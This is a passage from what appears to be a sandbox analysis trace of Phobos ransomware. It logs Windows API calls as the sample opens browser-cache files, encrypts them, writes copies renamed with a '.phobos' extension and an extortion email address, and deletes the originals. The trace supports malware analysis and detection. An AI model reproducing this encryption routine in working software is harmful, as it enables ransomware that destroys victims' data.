HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adfscript[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adfscript[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.483] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=10356) returned 1 [0190.483] CloseHandle (hObject=0x14c) returned 1 [0190.483] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adfscript[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adfscript[1]")) returned 0x2020 [0190.483] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adfscript[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adfscript[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adfscript[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adfscript[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.483] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.483] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adfscript[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adfscript[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.484] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32be8) returned 1 [0190.484] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.484] ReadFile (in: hFile=0x14c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2874, lpOverlapped=0x0) returned 1 [0190.512] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2880, dwBufLen=0x2880 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2880) returned 1 [0190.512] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2880, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2880, lpOverlapped=0x0) returned 1 [0190.513] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0190.513] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.513] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0190.513] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.513] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0190.513] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.513] CloseHandle (hObject=0x14c) returned 1 [0190.513] CloseHandle (hObject=0xac) returned 1 [0190.514] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adfscript[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adfscript[1]")) returned 1 [0190.515] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.522] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=4867) returned 1 [0190.522] CloseHandle (hObject=0x14c) returned 1 [0190.522] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1]")) returned 0x2020 [0190.522] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.522] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.522] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.524] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32d28) returned 1 [0190.524] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.524] ReadFile (in: hFile=0x14c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1303, lpOverlapped=0x0) returned 1 [0190.589] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1310, dwBufLen=0x1310 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1310) returned 1 [0190.589] WriteFile (in: hFile=0x154, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1310, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1310, lpOverlapped=0x0) returned 1 [0190.590] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32be8) returned 1 [0190.590] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.590] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150, dwBufLen=0x150 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150) returned 1 [0190.590] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.590] WriteFile (in: hFile=0x154, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x202, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x202, lpOverlapped=0x0) returned 1 [0190.590] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.590] CloseHandle (hObject=0x14c) returned 1 [0190.590] CloseHandle (hObject=0x154) returned 1 [0190.591] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1]")) returned 1 [0190.592] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1C;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1c;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=852361999[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.593] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2418) returned 1 [0190.593] CloseHandle (hObject=0x154) returned 1 [0190.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1C;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1c;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=852361999[1]")) returned 0x2020 [0190.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1C;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=852361999[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1c;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=852361999[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1C;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1c;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=852361999[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.594] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.594] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1C;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=852361999[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1c;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=852361999[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.595] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32d28) returned 1 [0190.595] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.595] ReadFile (in: hFile=0x154, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x972, lpOverlapped=0x0) returned 1 [0190.606] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x980, dwBufLen=0x980 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x980) returned 1 [0190.607] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x980, lpOverlapped=0x0) returned 1 [0190.608] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0190.608] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.608] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150, dwBufLen=0x150 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150) returned 1 [0190.608] CryptDestroyKey (hKey=0xa32de8) returned 1 [0190.608] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x202, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x202, lpOverlapped=0x0) returned 1 [0190.608] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.608] CloseHandle (hObject=0x154) returned 1 [0190.608] CloseHandle (hObject=0x14c) returned 1 [0190.608] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1C;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1c;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=852361999[1]")) returned 1 [0190.613] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\js[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\js[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.614] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1208) returned 1 [0190.614] CloseHandle (hObject=0x14c) returned 1 [0190.614] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\js[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\js[1]")) returned 0x2020 [0190.614] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\js[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\js[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\js[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\js[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.615] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.615] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\js[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\js[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.615] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32d28) returned 1 [0190.616] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.616] ReadFile (in: hFile=0x14c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4b8, lpOverlapped=0x0) returned 1 [0190.647] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4c0, dwBufLen=0x4c0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4c0) returned 1 [0190.647] WriteFile (in: hFile=0x154, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4c0, lpOverlapped=0x0) returned 1 [0190.648] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0190.648] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.648] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0190.648] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.648] WriteFile (in: hFile=0x154, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0190.648] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.648] CloseHandle (hObject=0x14c) returned 1 [0190.648] CloseHandle (hObject=0x154) returned 1 [0190.648] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\js[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\js[1]")) returned 1 [0190.649] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\js[2]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\js[2]"), 